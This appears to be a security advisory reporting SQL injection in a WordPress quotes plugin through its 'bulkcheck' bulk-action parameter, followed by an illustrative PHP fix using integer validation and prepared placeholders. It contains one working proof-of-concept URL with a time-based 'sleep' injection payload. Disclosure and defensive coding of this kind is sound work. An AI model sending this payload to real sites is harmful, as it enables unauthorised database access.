The plugin does not validate and escape the `bulkcheck` parameter before using it in a SQL statement, leading to SQL injection.
https://example.com/wp-admin/admin.php?page=quotes-collection&s=&_wpnonce=6e21e0a8b6&action=make_public&paged=1&bulkcheck[]=1%20and%20sleep(10))--%20-&action2=make_public
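
One way to handle a bulk-action parameter like `bulkcheck[]` safely, as an added example that is not the plugin's code or its actual fix. It assumes the values are meant to be numeric row ids; the table name `wp_example_quotes`, the column names and both function names are hypothetical.

```php
<?php
// Added illustration, not the plugin's code. Table, columns and function names are hypothetical.

/** Keep only elements that are plain positive decimal integers. */
function sanitize_bulk_ids($raw): array
{
    if (!is_array($raw)) {
        return [];
    }
    $ids = [];
    foreach ($raw as $value) {
        // \A...\z anchors the whole string: spaces, signs, parentheses,
        // SQL keywords and trailing newlines all fail the match.
        if (is_string($value) && preg_match('/\A[0-9]+\z/', $value) === 1 && (int) $value > 0) {
            $ids[] = (int) $value;
        }
    }
    return array_values(array_unique($ids));
}

/** Build a parameterised UPDATE with one %d placeholder per validated id. */
function build_make_public_query(array $ids): ?array
{
    if ($ids === []) {
        return null; // nothing valid selected: run no query at all
    }
    $placeholders = implode(',', array_fill(0, count($ids), '%d'));
    $sql = "UPDATE wp_example_quotes SET public = 'yes' WHERE quote_id IN ($placeholders)";
    return [$sql, $ids];
}

// Constructed request data: two valid ids plus the decoded value from the URL above.
$request = ['bulkcheck' => ['3', '7', '1 and sleep(10))-- -']];

$ids   = sanitize_bulk_ids($request['bulkcheck'] ?? []);
$query = build_make_public_query($ids);

print_r($ids);
if ($query !== null) {
    print_r($query);
    // Inside WordPress the pair would be executed as:
    //   $wpdb->query($wpdb->prepare($query[0], ...$query[1]));
}
```

The request value never reaches the SQL string: only the count of validated ids shapes the statement, and the ids themselves travel as bound `%d` arguments.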